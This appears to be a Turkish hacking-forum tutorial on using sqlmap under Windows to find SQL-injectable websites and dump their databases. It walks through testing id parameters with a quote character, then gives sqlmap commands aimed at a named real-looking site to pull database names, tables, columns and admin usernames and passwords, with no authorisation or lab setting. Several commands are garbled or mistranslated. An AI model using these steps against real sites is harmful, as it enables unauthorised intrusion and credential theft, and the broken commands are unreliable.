sqlmap kullanım windows

+ Python 2.7 adlı setup ile Python kuruyoruz + + sqlmap adlı dosyayı direkt Yerel Disk C'ye atıyoruz (yani c:\ dizininde olsun) + + İntelli Tamper 2.7 adlı program site...

+ Python 2.7 adlı setup ile Python kuruyoruz +
+ sqlmap adlı dosyayı direkt Yerel Disk C'ye atıyoruz (yani c:\ dizininde olsun) +
+ İntelli Tamper 2.7 adlı program site dosyalarını verir admin paneli bulmak için kullanırız bunu +
+ Safe3 adlı program çok sağlam SQL İnjection taraması yapar sitede
gerekli dosyalar https://yadi.sk/d/IW_EwUBdZ7CHX



Adım 1 : SQLMAP'ı CMD İle Çalıştırma

kodlar
+ Cd ..
+ cd sqlmap
yapamayanlar için 2.deneme sqlmap'ı indirdikten sonra masaüstüne atın sonra cmd yi açıp
+cd desktop
+cd "masaüstüne çıkardığınız dosyayı cmd ye taşıyın ve bırakıp enter a basın



Bu adımlarıda yaparsak SQLMAP'ı çalıştırmış oluruz.


Adım 2 : SQL Açıklı Site Bulmak




Sitelerin bazı sayfalarında , blogların paylaşımlarında bir id değeri olur örneğin "page.php?id=18" gibi.


Örnek Site : Welcome to the DockGuard website

Yukarıda verdiğim siteye girip sondaki ıd değerinin sonuna " ' " yani tek tırnak işareti koyduğunuzda aşağıdaki gibi ;

'

ve bu hatayı alıcaksınız

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''18''' at line 1

bu hata ve bu hata gibi hata aldığınızda sitede sql açığı olduğuna dair en basit belirtidir


Adım 3 : SQL Açıklı Siteyi Ele Geçirmek (Veritabanını Çekmek)


SQLMAP'te sitenin veritabanı isimlerini çekmek için şu kodu kullanırız ;

kod
sqlmap.py -u http://www.seaofstories.com/title.php?id=5193 --dbs


ENTER tuşuna bastığımızda işleme geçiyor SQLMAP'ımız sizlere soru sorduğunda sistem y diyip enter a basın

Tespiti yapıyor bize açık olduğunu söylüyor ve yine "y" yazıp ENTER tuşuna basıp devam ediyoruz sonucunda veritabanı bilgilerini çekiyor aşağıdaki gibi





Adım 3.2 - Veritabanı Tablolarını Çekmek

SQLMAP'te sitenin tablolarını çekmek için şu kodu kullanırız ;
kod
sqlmap.py -u http://www.seaofstories.com/title.php?id=5193 tablo ismi --tables


İşlem bittiğinde bize tablo isimlerini verecektir biz orda işimize yarayanı tespit edeceğiz yani örnek olarak "Administrator" tablosunu buldu diyelim Administrator tablosunun kolonlarını çekeceğiz.


Adım 3.3 - Veritabanı Tablolalarının Kolonlarını Çekmek



SQLMAP'te tablo kolonlarını çekmek için şu kodu kullanırız ;

Kod:
sqlmap.py -u http://hedefurl.com-D Veritabanı_Adı -T Tablo_Adı --columns
Yani yukarıdaki sitemizin Administrator tablosunun kolonlarını çekmek için şu şekilde yazacağız kodları ;

Kod:
sqlmap.py -u http://www.seaofstories.com/title.php?id=5193-D tablo ismi -T Administrators --columns
Bu şekilde kodumuzu yazıp ENTER tuşuna bastığımızda bize o tablonun kolonlarını çekecektir işlem sırasında yine [Y/N] ? diye sorarsa "y" diyip Enter basın.


kolonları çekti şimdi sıra geldi son işleme bize panele girmek için "Username" ve "Password" kolonlarındaki ıd ve şifreler gerekli bunun için 4. adıma gidiyoruz.





Adım 3.4 - Kolonlardaki Verileri (Username & Password) Çekme

SQLMAP'te kolonlardaki verileri çekmek için şu kodu kullanırız ;

Kod:
sqlmap.py -u http://hedefurl.com-D Veritabanı_Adı -T Tablo_Adı -C Kolon_Adı --dump
Yani yukarıdaki sitemizin password kolonlarındaki verilerini çekmek için şu şekilde yazacağız kodları

Kod:
sqlmap.py -u http://www.seaofstories.com/title.php?id=5193-D seaofstories_app -T Yöneticiler -C şifresi - döküm
Bu şekilde kodumuzu yazıp ENTER tuşuna bastığımızda bize admin şifrelerini çekecektir işlem sırasında yine [Y/N] ? diye sorarsa "y" diyip Enter basın.

Not : Aynı şekilde "username" adlı kolonu çekip admin giriş ıdlerine ulaşırsınız aynı şekilde olduğu için onu detaylı göstermedim onun kodunu yazarkende bu şekilde yazacaksınız ;

Kod:
sqlmap.py -u http://www.seaofstories.com/title.php?id=5193-D seaofstories_app -T Yöneticiler -C kullanıcı adı - döküm
 
💬 SpyHackerz Telegram — Anlık tartışmalar ve duyurular için katıl
131,947Konular
3,273,103Mesajlar
316,646Kullanıcılar
Aseux74Son Üye
Üst Alt